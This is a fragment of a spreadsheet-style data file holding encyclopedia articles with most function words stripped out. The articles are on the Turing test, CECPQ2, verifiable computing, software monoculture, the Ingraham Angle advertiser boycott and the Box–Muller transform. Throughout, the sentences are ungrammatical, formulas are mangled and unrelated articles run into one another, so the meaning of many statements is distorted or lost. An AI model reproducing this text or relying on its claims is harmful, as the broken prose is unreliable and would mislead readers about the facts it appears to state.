think?" second version appeared later turing's 1950 paper. similar original imitation game test, role player performed computer. however, role player performed rather woman. attention particular digital computer true modifying computer adequate storage, suitably increasing speed action, providing appropriate programme, made play satisfactorily part imitation game, part taken man? version, player (the computer) player trying trick interrogator making incorrect decision. standard root interpretation standard interpretation included original paper, accepted debated. common understanding purpose turing test specifically determine whether computer able fool interrogator believing human, rather whether computer could imitate human. while dispute whether interpretation intended turing, sterrett believes thus conflates second version one, others, traiger, nevertheless viewed "standard interpretation." version, player computer player person either sex. role interrogator determine male female, computer human. fundamental issue standard interpretation interrogator cannot differentiate responder human, machine. there issues duration, standard interpretation generally considers limitation something reasonable. imitation game standard turing test controversy arisen alternative formulations test turing intended. sterrett argues distinct tests extracted 1950 paper that, pace turing's remark, equivalent. test employs party game compares frequencies success referred "original imitation game test", whereas test consisting human judge conversing human machine referred "standard turing test", noting sterrett equates "standard interpretation" rather second version imitation game. sterrett agrees standard turing test (stt) problems critics cite feels that, contrast, original imitation game test (oig test) defined immune many them, crucial difference: unlike stt, make similarity human performance criterion, even though employs human performance setting criterion machine intelligence. fail test, argued virtue test intelligence failure indicates lack resourcefulness: test requires resourcefulness associated intelligence merely "simulation human conversational behaviour". general structure test could even used non-verbal versions imitation games.still writers interpreted turing proposing imitation game test, without specifying take account turing's statement test proposed using party version imitation game based upon criterion comparative frequency success imitation game, rather capacity succeed round game. saygin suggested maybe original game proposing less biased experimental design hides participation computer. imitation game also includes "social hack" found standard interpretation, game computer male human required play pretending someone not. should interrogator know computer? crucial piece laboratory test control. turing never makes clear whether interrogator tests aware participants computer. states player replaced machine, player made aware replacement. when colby, hilf, weber kramer tested parry, assuming interrogators need know interviewed computer interrogation. ayse saygin, peter swirski, others highlighted, makes difference implementation outcome test. experimental study looking gricean maxim violations using transcripts loebner's one-to-one (interrogator-hidden interlocutor) prize contests 1994 1999, ayse saygin found significant differences responses participants knew know computers involved. strengths tractability simplicity power appeal turing test derives simplicity. philosophy mind, psychology, modern neuroscience unable provide definitions "intelligence" "thinking" sufficiently precise general applied machines. without definitions, central questions philosophy artificial intelligence cannot answered. turing test, even imperfect, least provides something actually measured. such, pragmatic attempt answer difficult philosophical question. breadth subject matter format test allows interrogator give machine wide variety intellectual tasks. turing wrote "the question answer method seems suitable introducing almost fields human endeavour wish include." john haugeland adds "understanding words enough; understand topic well."to pass well-designed turing test, machine must natural language, reason, knowledge learn. test extended include video input, well "hatch" objects passed: would force machine demonstrate skilled well designed vision robotics well. together, represent almost major problems artificial intelligence research would like solve.the feigenbaum test designed take advantage broad range topics available turing test. limited form turing's question-answer game compares machine abilities experts specific fields literature chemistry. ibm's watson machine achieved success versus machine television quiz show human knowledge, jeopardy! emphasis emotional aesthetic intelligence cambridge honours graduate mathematics, turing might expected propose test computer intelligence requiring expert knowledge highly technical field, thus anticipating recent approach subject. instead, already noted, test described seminal 1950 paper requires computer able compete successfully common party game, performing well typical answering series questions pretend convincingly woman contestant. given status human sexual dimorphism ancient subjects, thus implicit scenario questions answered involve neither specialised factual knowledge information processing technique. challenge computer, rather, demonstrate empathy role female, demonstrate well characteristic aesthetic sensibility—both qualities display snippet dialogue turing imagined: interrogator: will please tell length hair?contestant: hair shingled, longest strands nine inches long.when turing introduce specialised knowledge imagined dialogues, subject maths electronics, poetry: interrogator: first line sonnet reads, "shall compare thee summer's day," would spring day" well better?witness: scan.interrogator: winter's day." that would scan right.witness: yes, nobody wants compared winter's day.turing thus demonstrates interest empathy aesthetic sensitivity components artificial intelligence; light increasing awareness threat amok, suggested focus perhaps represents critical intuition turing's part, i.e., emotional aesthetic intelligence play role creation "friendly ai". noted, however, whatever inspiration turing might able lend direction depends upon preservation original vision, say, further, promulgation "standard interpretation" turing test—i.e., focuses discursive intelligence only—must regarded caution. weaknesses turing explicitly state turing test could used measure "intelligence", human quality. wanted provide clear understandable alternative word "think", could reply criticisms possibility "thinking machines" suggest ways research might move forward. numerous experts field, including cognitive scientist gary marcus, insist turing test shows easy fool humans indication machine intelligence.nevertheless, turing test proposed measure machine's "ability think" "intelligence". this proposal received criticism philosophers computer scientists. assumes interrogator determine machine "thinking" comparing behaviour human behaviour. every element assumption questioned: reliability interrogator's judgement, value comparing behaviour value comparing machine human. because considerations, researchers questioned relevance test field. human intelligence intelligence general turing test directly test whether computer behaves intelligently. tests whether computer behaves like human being. since human behaviour intelligent behaviour exactly thing, test fail accurately measure intelligence ways: some human behaviour unintelligent turing test requires machine able execute human behaviours, regardless whether intelligent. even tests behaviours considered intelligent all, susceptibility insults, temptation simply, high frequency typing mistakes. machine cannot imitate unintelligent behaviours detail fails test.this objection raised economist, article entitled "artificial stupidity" published shortly first loebner prize competition 1992. article noted first loebner winner's victory due, least part, ability "imitate human typing errors." turing suggested programs errors output, better "players" game.some intelligent behaviour inhuman turing test test highly intelligent behaviours, ability solve difficult problems come original insights. fact, specifically requires deception part machine: machine intelligent human must deliberately avoid appearing intelligent. solve computational problem practically impossible human solve, interrogator would know program human, machine would fail test.because cannot measure intelligence beyond ability humans, test cannot used build evaluate systems intelligent humans. because this, several test alternatives would able evaluate super-intelligent systems proposed. language-centric objection another well known objection raised towards turing test concerns exclusive focus linguistic behaviour (i.e. “language-based” experiment, cognitive faculties tested). this drawback downsizes role modality-specific “intelligent abilities” concerning human beings psychologist howard gardner, “multiple intelligence theory”, proposes consider (verbal-linguistic abilities those). consciousness simulation consciousness turing test concerned strictly subject acts external behaviour machine. regard, takes behaviourist functionalist approach study mind. example eliza suggests machine passing test able simulate human conversational behaviour following simple (but large) list mechanical rules, without thinking mind all. john searle argued external behaviour cannot used determine machine "actually" thinking merely "simulating thinking." chinese room argument intended show that, even turing test good operational definition intelligence, indicate machine mind, consciousness, intentionality. (intentionality philosophical term power thoughts "about" something.) turing anticipated line criticism original paper, writing: wish give impression think mystery consciousness. there instance, something paradox connected attempt localise think mysteries necessarily need solved answer question concerned paper. naïveté interrogators practice, test's results easily dominated computer's intelligence, attitudes, skill, naïveté questioner. turing specify precise skills knowledge required interrogator description test, term "average interrogator": "[the] average interrogator would cent chance making right identification five minutes questioning".chatterbot programs eliza repeatedly fooled unsuspecting people believing communicating human beings. cases, "interrogators" even aware possibility interacting computers. successfully appear human, need machine intelligence whatsoever superficial resemblance human behaviour required. early loebner prize competitions used "unsophisticated" interrogators easily fooled machines. since 2004, loebner prize organisers deployed philosophers, computer scientists, journalists among interrogators. nonetheless, experts deceived machines.one interesting feature turing test frequency confederate effect, confederate (tested) humans misidentified interrogators machines. suggested interrogators expect human responses necessarily typical humans. result, individuals categorised machines. this therefore work favour competing machine. humans instructed "act themselves", sometimes answers like interrogator expects machine say. this raises question ensure humans motivated "act human". silence critical aspect turing test machine must give away machine utterances. interrogator must make "right identification" correctly identifying machine that. however machine remains silent conversation, possible interrogator accurately identify machine means calculated guess. even taking account parallel/hidden human part test help situation humans often misidentified machine. impracticality irrelevance: turing test research mainstream researchers argue trying pass turing test merely distraction fruitful research. indeed, turing test active focus much academic commercial effort—as stuart russell peter norvig write: researchers devoted little attention passing turing test." there several reasons. first, easier ways test programs. most current research ai-related fields aimed modest specific goals, object recognition logistics. test intelligence programs solve problems, researchers simply give task directly. stuart russell peter norvig suggest analogy history flight: planes tested well fly, comparing birds. "aeronautical engineering texts," write, define goal field 'making machines exactly like pigeons fool pigeons.'"second, creating lifelike simulations human beings difficult problem need solved achieve basic goals research. believable human characters interesting work art, game, sophisticated user interface, part science creating intelligent machines, machines solve problems using intelligence. turing intend idea used test intelligence programs wanted provide clear understandable example discussion philosophy artificial intelligence. john mccarthy argues surprised philosophical idea turns useless practical applications. observes philosophy "unlikely effect practice research philosophy science generally practice science." variations numerous versions turing test, including expounded above, raised years. reverse turing test captcha modification turing test wherein objective roles reversed machines humans termed reverse turing test. example implied work psychoanalyst wilfred bion, particularly fascinated "storm" resulted encounter mind another. 2000 book, among several original points regard turing test, literary scholar peter swirski discussed detail idea termed swirski test—essentially reverse turing test. pointed overcomes standard objections levelled standard version. carrying idea forward, hinshelwood described mind "mind recognizing apparatus". challenge would computer able determine interacting human another computer. this extension original question turing attempted answer would, perhaps, offer high enough standard define machine could "think" typically define characteristically human. captcha form reverse turing test. before allowed perform action website, user presented alphanumerical characters distorted graphic image asked type out. this intended prevent automated systems used abuse site. rationale software sufficiently sophisticated read reproduce distorted image accurately exist available average user), system able likely human. software could reverse captcha accuracy analysing patterns generating engine started developed soon creation captcha. 2013, researchers vicarious announced developed system solve captcha challenges google, yahoo!, paypal time. 2014, google engineers demonstrated system could defeat captcha challenges 99.8% accuracy. 2015, shuman ghosemajumder, former click fraud czar google, stated cybercriminal sites would defeat captcha challenges fee, enable various forms fraud. distinguishing accurate language actual understanding variation motivated concern modern natural language processing prove highly successful generating text basis huge text corpus could eventually pass turing test simply manipulating words sentences used initial training model. since interrogator precise understanding training data, model might simply returning sentences exist similar fashion enormous amount training data. reason, arthur schwaninger proposes variation turing test distinguish systems capable using language systems understand language. proposes test machine confronted philosophical questions depend prior knowledge require self-reflection answered appropriately. subject matter expert turing test another variation described subject-matter expert turing test, machine's response cannot distinguished expert given field. this also known "feigenbaum test" proposed edward feigenbaum 2003 paper. "low-level" cognition test robert french (1990) makes case interrogator distinguish human non-human interlocutors posing questions reveal low-level (i.e., unconscious) processes human cognition, studied cognitive science. such questions reveal precise details human embodiment thought unmask computer unless experiences world humans total turing test "total turing test" variation turing test, proposed cognitive scientist stevan harnad, adds requirements traditional turing test. interrogator also test perceptual abilities subject (requiring computer vision) subject's ability manipulate objects (requiring robotics). electronic health records letter published communications describes concept generating synthetic patient population proposes variation turing test assess difference synthetic real patients. letter states: context, though human physician readily distinguish synthetically generated real live human patients, could machine given intelligence make determination own?" letter states: "before synthetic patient identities become public health problem, legitimate market might benefit applying turing test-like techniques ensure greater data reliability diagnostic value. techniques must thus consider patients' heterogeneity likely greater complexity allen eighth-grade-science-test able grade." minimum intelligent signal test minimum intelligent signal test proposed chris mckinstry "the maximum abstraction turing test", binary responses (true/false yes/no) permitted, focus capacity thought. eliminates text chat problems like anthropomorphism bias, require emulation unintelligent human behaviour, allowing systems exceed human intelligence. questions must stand own, however, making like test interrogation. typically used gather statistical data performance artificial intelligence programs measured. hutter prize organisers hutter prize believe compressing natural language text hard problem, equivalent passing turing test. data compression test advantages versions variations turing test, including: gives single number directly used compare machines "more intelligent." require computer judgethe main disadvantages using data compression test are: possible test humans way. unknown particular "score" test—if any—is equivalent passing human-level turing test. other tests based compression kolmogorov complexity related approach hutter's prize appeared much earlier late 1990s inclusion compression problems extended turing test. tests completely derived kolmogorov complexity. other related tests line presented hernandez-orallo dowe.algorithmic short, attempt convert theoretical universal intelligence measure legg hutter (based solomonoff's inductive inference) working practical test machine intelligence.two major advantages tests applicability nonhuman intelligences absence requirement human testers. ebert test turing test inspired ebert test proposed 2011 film critic roger ebert test whether computer-based synthesised voice sufficient skill terms intonations, inflections, timing forth, make people laugh. universal turing test inspired black-box-based machine intelligence metrics based large diversity intelligent systems, turing test inspired universal metrics used, able measure machine intelligence compare systems based intelligence. property intelligence metric treating aspect variability intelligence. black-box-based intelligence metrics, like metrintpair metrintpairii, universal since depend architecture systems whose intelligence measure. metrintpair accurate metric simultaneously measure compare intelligence systems. metrintpairii accurate robust metric simultaneously measure compare intelligence number intelligent systems. both metrics specific pairwise based intelligence measurements classify studied systems intelligence classes. google lamda chatbot june 2022 google lamda (language model dialog applications) chatbot received widespread coverage regarding claims achieved sentience. initially article economist google research fellow blaise agüera arcas said chatbot demonstrated degree understanding social relationships. several days later, google engineer blake lemoine claimed interview washington post lamda achieved sentience. lemoine placed leave google internal assertions effect. agüera arcas google vice president) gennai (head responsible innovation) investigated claims dismissed them. lemoine's assertion roundly rejected experts field, pointing language model appearing mimic human conversation indicate intelligence present behind despite seeming pass turing test. widespread discussion proponents claim lamda reached sentience sparked discussion across social-media platforms, include defining meaning sentience well means human. conferences turing colloquium 1990 marked fortieth anniversary first publication turing's "computing machinery intelligence" paper, and, renewed interest test. significant events occurred year: first turing colloquium, held university sussex april, brought together academics researchers wide variety disciplines discuss turing test terms past, present, future;</t>
  </si>
  <si>
    <t>CECPQ2</t>
  </si>
  <si>
    <t>cryptography, combined elliptic-curve post-quantum (cecpq2) quantum secure modification transport layer security (tls) developed google. intended used experimentally, help evaluate performance post quantum key-exchange algorithms actual users' devices. details similarly predecessor cecpq1, cecpq2 aims provide confidentiality attacker large scale quantum computer. essentially plugin key-agreement part. cecpq2 combines exchange mechanisms: classical x25519 hrss (hülsing, rijneveld, schanck, schwabe) scheme instantiation ntru lattice based exchange primitive). additionally, kris kwiatkowski implemented deployed alternative version post-quantum exchange algorithm, titled cecpq2b. similarly cecpq2, also hybrid post-quantum exchange scheme, based supersingular isogeny exchange (sike) instead hrss. cecpq2 uses bytes shared secret material derived classical x25519 mechanism, bytes shared secret material derived quantum-secure hrss mechanism. resulting bytes concatenated used secret key. concatenation meant assure protocol provides least security level widely used x25519, hrss found insecure. algorithm deployed server side using cloudflare's infrastructure, client side using google chrome canary. since parties need support algorithm chosen, experiment available chrome canary users accessing websites hosted cloudflare. estimated experiment started mid-2019. considered step general program cloudflare transition post-quantum safe cryptographic primitives. also elliptic-curve diffie–hellman references</t>
  </si>
  <si>
    <t>Verifiable computing</t>
  </si>
  <si>
    <t>verifiable computing verified computation verified computing) enables computer offload computation function, perhaps untrusted clients, maintaining verifiable results. clients evaluate function return result proof computation function carried correctly. introduction notion came result increasingly common phenomenon "outsourcing" computation untrusted users projects seti@home also growing desire weak clients outsource computational tasks powerful computation service like cloud computing. concept dates back work babai al., studied various terms, including "checking computations" (babai al.), "delegating computations", "certified computation", verifiable computing. term verifiable computing formalized rosario gennaro, craig gentry, bryan parno, echoes micali's "certified computation". motivation overview growing desire outsource computational tasks relatively weak computational device (client) powerful computation services (worker), problem dishonest workers modify client's software return plausible results without performing actual work motivated formalization notion verifiable computation.verifiable computing concerned getting result outsourced function client's input proof correctness, also client able verify proof significantly less computational effort computing function scratch. considerable attention devoted verifying computation functions performed untrusted workers including secure coprocessors, trusted platform modules (tpms), interactive proofs, probabilistically checkable proofs, efficient arguments, micali's proofs. these verifications either interactive require client interact worker verify correctness proof, non-interactive protocols proven random oracle model. verification replication largest verified computation (seti@home) uses verification replication. seti@home verification process involves client machine many worker machines. client machine sends identical workunits multiple computers least when enough results returned reasonable amount time—due machines accidentally turned off, communication breakdowns, etc.—or results agree—due computation errors, cheating submitting false data without actually work, etc.—then client machine sends identical workunits worker machines. once minimum quorum (often results agree, client assumes results (and identical results workunit) correct. client grants credit machines returned correct results. verifiable computation gennaro defined notion verifiable computation scheme protocol polynomial time parties collaborate computation function {0,1}n {0,1}m. this scheme consists three main phases: preprocessing. this stage performed client order calculate auxiliary information associated part information public shared worker rest private kept client. input preparation. stage, client calculates auxiliary information input function. part information public rest private kept client. public information sent worker compute input data. output computation verification. stage, worker uses public information associated function input, calculated previous phases, compute encoded output function provided input. this result returned client verify correctness computing actual value output decoding result returned worker using private information calculated previous phases.the defined notion verifiable computation scheme minimizes interaction client worker exactly messages, single message sent party party different phases protocol. example scheme based fully homomorphic encryption gennaro defined verifiable computation scheme function using yao's garbled circuit combined fully homomorphic encryption system. this verifiable computation scheme defined follows:vc (keygen, probgen, compute, verify) consists four algorithms follows: keygen(f, (pk, sk): randomized generation algorithm generates keys, public private, based security parameter public encodes target function sent worker compute hand, secret kept private client. probgensk(x) (σx, τx): problem generation algorithm encodes function input values, public private, using secret public value given worker compute f(x) with, secret value kept private client. compute(pk, worker computes encoded value function's output f(x) using client's public encoded input verifysk (τx, verification algorithm converts worker's encoded output actual output function using secret secret “decoding” outputs f(x) represents valid output outputs otherwise.the protocol verifiable computations scheme defined gennaro works follows: function represented boolean circuit generation algorithm would applied. generation algorithm runs yao's garbling procedure boolean circuit compute public secret keys. public (pk) composed ciphertexts represent garbled circuit, secret (sk) composed random wire labels. generated secret used problem generation algorithm. this algorithm first generates pair public secret keys homomorphic encryption scheme, uses keys homomorphic scheme encrypt correct input wires, represented secret garbled circuit. produced ciphertexts represent public encoding input (σx) given worker, secret (τx) kept private client. after that, worker applies computation steps yao's protocol ciphertexts generated problem generation algorithm. this done recursively decrypting gate ciphertexts arriving final output wire values (σy). homomorphic properties encryption scheme enable worker obtain encryption correct output wire. finally, worker returns ciphertexts output client decrypts compute actual output f(x) definition verifiable computation scheme states scheme correct secure. scheme correctness achieved problem generation algorithm produces values enable honest worker compute encoded output values verify successfully correspond evaluation inputs. hand, verifiable computation scheme secure malicious worker cannot convince verification algorithm accept incorrect output given function input practical verifiable computing although shown verifiable computing possible theory (using fully homomorphic encryption probabilistically checkable proofs), known constructions expensive practice. recently, researchers looked making verifiable computation practical. effort work austin researchers. authors start argument system based probabilistically checkable proofs reduce costs factor 1020. they also implemented techniques pepper system. authors note "our conclusion that, tool building secure systems, pcps argument systems lost cause." overall area, includes number implementations different groups, surveyed. references</t>
  </si>
  <si>
    <t>Monoculture (computer science)</t>
  </si>
  <si>
    <t>computer science, monoculture community computers identical software. computer systems community thus vulnerabilities, and, like agricultural monocultures, subject catastrophic failure event successful attack. overview with global trend increased usage reliance computerized systems, vendors supply solutions used throughout industry (such microsoft windows) forms algorithmic monocultures. monocultures form naturally since utilize economies scale, cheaper manufacture distribute single solution. furthermore, used large community bugs discovered relativity fast. like agricultural monocultures, algorithmic monocultures diverse, thus susceptible correlated failures failure many parts participating monoculture. complete non-monocultures, outcome components mutually independent thus un-correlated, chance catastrophic event (failure parts monoculture) multiplication component failure probability (exponentially decreasing). end, perfect monocultures completely correlated, thus single point failure. this means chance catastrophic event constant failure probably single component. examples since operating systems used almost every workstation form monocultures. example geer argued microsoft monoculture, since majority overall number workstations connected internet running versions microsoft windows operating system, many vulnerable attacks. large monocultures also arise software libraries, example log4shell exploit popular log4j library estimated affect hundreds millions devices.internet applications also shown suffer software monoculture. individual level concerns concept significant discussing computer security viruses, main threat exposure security vulnerabilities. since monocultures diverse, vulnerability found exists individual members monoculture increasing risk exploitation. example exploit wednesday windows security patches released increase exploitation events updated machines. clifford stoll wrote 1989 dealing morris worm: computer virus specialized: virus works cannot anything macintosh unix computer. similarly, arpanet virus could strike systems running berkeley unix. computers running operating systems—like at&amp;t unix, vms, dos—were totally immune. diversity, then, works viruses. systems arpanet berkeley unix, virus would disabled fifty thousand them. instead, infected couple thousand. biological viruses specialized: can't catch dogs. bureaucrats managers forever urge standardize single type system: "let's workstations" "only systems." somehow communities computers diverse population—with data general machines sitting next digital vaxes; ibms connected sonys. like neighborhoods, electronic communities thrive diversity. another main concern increased spread algorithmic bias. light increased usage machine learning growing awareness biases introduced algorithms. nature monocultures exacerbate problem since makes bias systemic spreading unfair decisions. social level concerns monocultures lead braess's like paradoxes introducing "better option" (such accurate algorithm) leads suboptimal monocultural convergence monoculture whose correlated nature results degraded overall quality decisions. since monocultures form areas high-stakes decisions credit scoring automated hiring, important achieve optimal decision making. this scenario studied throw lens mechanism design, agents choosing algorithms, return correlated outputs. overall impact decision making measured social welfare. suboptimal monocultures convergence automated hiring this section demonstrates concern suboptimal monoculture convergence using automated hiring case study. hiring process ranking group candidates hiring top-valued. recent years automated hiring (automatically ranking candidates based interaction powered system) became popular. shown kleinberg, assumptions, suboptimal automated hiring monocultures naturally form, namely, choosing correlated algorithm dominant strategy, thus converging monoculture leads suboptimal social welfare. framework scenario consider firms group {\displaystyle {\displaystyle candidate hidden utilities {\displaystyle x_{i}} hiring process firm produce noisy-ranking candidates, firm random order) hires first available candidate ranking. each firm choose either independent human rankers common algorithmic ranking. ranking algorithm {\displaystyle {\mathcal {f}}_{\theta modeled noisy distribution permutations {\displaystyle parametrized accuracy parameter {\displaystyle \theta order {\displaystyle {\mathcal {f}}_{\theta make sense satisfy conditions: differentiability: probability permutation {\displaystyle continues differentiable {\displaystyle \theta asymptotic optimality: true ranking {\displaystyle ^{*}} {\displaystyle \lim _{\theta \infty }pr[\pi ^{*}]=1} monotonicity: expected utility top-ranked candidate gets better {\displaystyle \theta increases, even subset {\displaystyle removed.these conditions state firm always prefer higher values {\displaystyle \theta even first selection order. both algorithmic human ranking methods form {\displaystyle {\mathcal {f}}_{\theta differ accuracy parameters {\displaystyle \theta _{a},\theta _{h}} algorithmic ranking output corotated always outputs permutation. contrast, human ranked premutation drawn {\displaystyle {\mathcal {f}}_{\theta _{h}}} independently firms. {\displaystyle s_{1},s_{2}\in \{a,h\}} strategies first second firm, social welfare {\displaystyle w_{s_{1},s_{2}}} defied utilities hired candidates. conditions suboptimal convergence braess's like paradox framework suboptimal monocultures converges. that using algorithmic ranking dominant strategy thus converging toward monoculture yields suboptimal welfare {\displaystyle w_{a,a}&lt;w_{h,h}} (welfare world without algorithmic ranking higher). main theorem proved kleinberg model {\displaystyle \theta _{h}} noisy ranking family {\displaystyle {\mathcal {f}}_{\theta satisfy conditions: preference first position: {\displaystyle \theta {\displaystyle ,\sigma \sim {\mathcal {f}}_{\theta {\displaystyle \mathbb [\pi _{1}-\pi _{2}|\pi _{1}\neq \sigma _{1}]&gt;0} preference weaker competition: {\displaystyle \theta _{1}&gt;\theta _{2},\sigma \sim {\mathcal {f}}_{\theta _{1}}and\ ,\tau \sim {\mathcal {f}}_{\theta _{2}}:\mathbb [\pi _{1}^{(-\sigma _{1})}]&lt;\mathbb [\pi _{1}^{(-\tau _{1})}]} .there exists {\displaystyle \theta _{a}&gt;\theta _{h}} firms prefer using sherd algorithmic ranking even though social welfare higher human evaluators. words regardless accuracy human rankers exists accurate algorithm whose introduction leads suboptimal monoculture convergence. implications theorem conditions, firms chose algorithmic ranking even though correlated nature algorithmic monocultures degrades total social welfare. even though algorithmic rankings accurate. first condition {\displaystyle {\mathcal {f}}_{\theta (preference first position) equivalent preference firms independent ranking setting algorithmic). this means firm prefers independent ranking methods given else equal. intuition behind preference weaker competition candidate removed (hired different firm), best remaining candidate better expectation removed candidate chosen based less accurate ranking. thus, firm always prefer competitors would less accurate. these conditions {\displaystyle {\mathcal {f}}_{\theta mallows model distributions types random utility models (gaussian laplacian noise). also comparison operating systems domination clones history computing hardware (1960s–present) compatible open architecture software diversity timeline operating systems wintel researcher lecture suboptimal monocultures convergence references</t>
  </si>
  <si>
    <t>Boycott of The Ingraham Angle</t>
  </si>
  <si>
    <t>boycott ingraham angle ongoing boycott companies david hogg advertise products controversial news television show ingraham angle. marjory stoneman douglas high school student david hogg initiated boycott show's host, laura ingraham, ridiculed amidst conspiracy theories related shooting school 2018, seventeen students died hogg witness survivor. ingraham's particular criticism hogg universities declined offer admission college application.hogg accused ingraham cyberbullying suggested followers tell show's sponsors cancel advertising purchases. response, several advertisers left show ingraham apologized. hogg dismissed apology insincere, supporters continued pressure campaign show's advertisers.more sponsors stopped advertising show. public polling showed public perception news declined advertiser. advertising rates show declined slightly, amount advertising show reduced much half.the boycott resulted mixed reactions. supporters ingraham's position included employer news, musician nugent, russian brigades. bill maher defended ingraham grounds free speech, saying boycott wrong. back week pre-planned vacation, ingraham described boycott "stalinist" blamed leftists working free speech. hogg intensified boycott following months, raising pressure show. 2020 global attributed decline news advertising revenue boycott. background february 2018, david hogg survived stoneman douglas high school shooting mass shooter killed seventeen people wounded seventeen more. days shooting, hogg shooting survivors founded never again msd, student group advocating safety school. march never again lead organizer march lives, global student-led demonstration demands change united states. more million protestors attended events around world. david hogg reported social media colleges offered declined admission him. march 2018, published article listing schools. following news personality laura ingraham ridiculed hogg, tweeting: "david hogg rejected four colleges which applied whines (dinged ucla gpa...totally predictable given acceptance rates.)" hogg responded tweet listed advertisers, suggested advertisers boycotted. impact within days, fifteen companies ceased advertising ingraham's show, including at&amp;t, office depot tripadvisor. other companies hardware dropped show ensuing days. days later, allstate stopped advertising ingraham's show, circulating memo employees citing company's values odds ingraham's comments.ingraham publicly apologized remark within half hours initial criticism, hogg rejected insincere, saying apologized advertisers left show, would accept apology future denounced network treated friends. republican strategist steve schmidt speculated ingraham's advertisers pulled support: "...this kid's scared. he's scared nra. he's intimidated scared laura ingraham."ingraham returned show april pre-planned week-long easter break, support rupert murdoch. according washington post, advertising time dropped half following spat, speculation might "blow over" advertisers returning show interest died down. news co-president jack abernethy said network "cannot allow voices censored agenda-driven intimidation efforts".a total sponsors stopped advertising ingraham angle mid-april 2018 polling yougov brandindex days following announcement boycott showed news brand sustained significantly consumer perception damage advertisers. positive consumer perception ingraham dropped percent percent, according celebrity data research firm spotted. rates advertising show dropped start boycott. prices 30-second spot dropped average range $12,310-$14,732 average range $11,305-$13,405, according analysts. advertising time show dropped much percent.a 2020 review global remarked ingraham's views continued deterrent advertisers contribute decline advertising revenue parent news. forbes also reflected boycott 2020. list advertisers boycott following ingraham's comments hogg, following sponsors made announcements would longer advertise ingraham angle. reactions friday, march show, ingraham announced taking week-long absence show easter. this week-long break already planned advance prior controversy advertiser loss, according ingraham news.my pillow creator mike lindell became target boycott, refusing join advertisers pulling ingraham angle.fox news, ingraham's media organization, responded boycott stating, cannot allow voices censored agenda-driven intimidation efforts".according hamilton hundreds russian bots came ingraham's defense twitter weekend following boycott. posts hashtag #istandwithlaura jumped 2800 percent trending hashtag russian twitter accounts.talk show host bill maher came defense ingraham, saying boycott wrong, show continued grounds advocating free speech, saying himself, victim boycott, felt unfairly treated past. references external links laura ingraham advertisers, tweet established boycott</t>
  </si>
  <si>
    <t>Box–Muller transform</t>
  </si>
  <si>
    <t>box–muller transform, george edward pelham mervin edgar muller, random number sampling method generating pairs independent, standard, normally distributed (zero expectation, unit variance) random numbers, given source uniformly distributed random numbers. method fact first mentioned explicitly raymond paley norbert wiener 1934.the box–muller transform commonly expressed forms. basic form given muller takes samples uniform distribution interval maps standard, normally distributed samples. polar form takes samples different interval, [−1, +1], maps normally distributed samples without sine cosine functions. box–muller transform developed computationally efficient alternative inverse transform sampling method. ziggurat algorithm gives efficient method scalar processors (e.g. cpus), box–muller transform superior processors vector units (e.g. gpus modern cpus). basic form suppose independent samples chosen uniform distribution unit interval {\displaystyle z_{0}=r\cos(\theta )={\sqrt {-2\ln u_{1}}}\cos(2\pi u_{2})\,} {\displaystyle z_{1}=r\sin(\theta )={\sqrt {-2\ln u_{1}}}\sin(2\pi u_{2}).\,} then independent random variables standard normal distribution. derivation based property two-dimensional cartesian system, coordinates described independent normally distributed random variables, random variables (shown above) corresponding polar coordinates also independent expressed {\displaystyle r^{2}=-2\cdot u_{1}\,} {\displaystyle \theta =2\pi u_{2}.\,} because square norm standard bivariate normal variable chi-squared distribution degrees freedom. special case degrees freedom, chi-squared distribution coincides exponential distribution, equation simple generating required exponential variate. polar form polar form first proposed bell modified knop. while several different versions polar method described, version knop described widely used, part inclusion numerical recipes. given independent uniformly distributed closed interval [−1, +1], discard another pair because uniformly distributed points within unit circle admitted, values uniformly distributed open interval too. latter seen calculating cumulative distribution function interval this area circle radius {\displaystyle \scriptstyle {\sqrt {s}}} divided {\displaystyle \scriptstyle from find probability density function constant value interval equally angle divided {\displaystyle \scriptstyle 2\pi uniformly distributed interval independent identify value {\displaystyle \scriptstyle \theta /(2\pi basic form. shown figure, values {\displaystyle \scriptstyle \cos \theta =\cos 2\pi u_{2}} {\displaystyle \scriptstyle \sin \theta =\sin 2\pi u_{2}} basic form replaced ratios {\displaystyle \scriptstyle \cos \theta =u/r=u/{\sqrt {s}}} {\displaystyle \scriptstyle \sin \theta =v/r=v/{\sqrt {s}}} respectively. advantage calculating trigonometric functions directly avoided. this helpful trigonometric functions expensive compute single division replaces one. just basic form produces standard normal deviates, alternate calculation. {\displaystyle z_{0}={\sqrt {-2\ln u_{1}}}\cos(2\pi u_{2})={\sqrt {-2\ln s}}\left({\frac {u}{\sqrt {s}}}\right)=u\cdot {\sqrt {\frac {-2\ln s}{s}}}} {\displaystyle z_{1}={\sqrt {-2\ln u_{1}}}\sin(2\pi u_{2})={\sqrt {-2\ln s}}\left({\frac {v}{\sqrt {s}}}\right)=v\cdot {\sqrt {\frac {-2\ln s}{s}}}.} contrasting forms polar method differs basic method type rejection sampling. discards generated random numbers, faster basic method simpler compute (provided random number generator relatively fast) numerically robust. avoiding expensive trigonometric functions improves speed basic form. discards 21.46% total input uniformly distributed random number pairs generated, i.e. discards 27.32% uniformly distributed random number pairs gaussian random number pair generated, requiring 1.2732 input random numbers output random number. basic form requires multiplications, logarithm, square root, trigonometric function normal variate. processors, cosine sine argument calculated parallel using single instruction. notably intel-based machines, fsincos assembler instruction expi instruction (usually available intrinsic function), calculate complex {\displaystyle \exp(iz)=e^{iz}=\cos z+i\sin z,\,} separate real imaginary parts. note: explicitly calculate complex-polar form following substitutions general form, {\displaystyle r={\sqrt {-2\ln(u_{1})}}} {\displaystyle z=2\pi u_{2}.} then {\displaystyle re^{iz}={\sqrt {-2\ln(u_{1})}}e^{i2\pi u_{2}}={\sqrt {-2\ln(u_{1})}}\left[\cos(2\pi u_{2})+i\sin(2\pi u_{2})\right].} polar form requires multiplications, logarithm, square root, division normal variate. effect replace multiplication trigonometric function single division conditional loop. tails truncation when computer used produce uniform random variable inevitably inaccuracies lower bound close numbers generator uses bits output value, smallest non-zero number generated {\displaystyle 2^{-32}} when {\displaystyle u_{1}} {\displaystyle u_{2}} equal box–muller transform produces normal random deviate equal 6.660 {\displaystyle \delta ={\sqrt {-2\ln(2^{-32})}}\cos(2\pi 2^{-32})\approx 6.660} this means algorithm produce random variables 6.660 standard deviations mean. this corresponds proportion 2.738 {\displaystyle 2(1-\phi (\delta ))\simeq 2.738\times 10^{-11}} lost truncation, {\displaystyle \phi (\delta standard cumulative normal distribution. with bits limit pushed 9.419 {\displaystyle \delta =9.419} standard deviations, {\displaystyle 2(1-\phi (\delta ))&lt;5\times 10^{-21}} implementation standard box–muller transform generates values standard normal distribution (i.e. standard normal 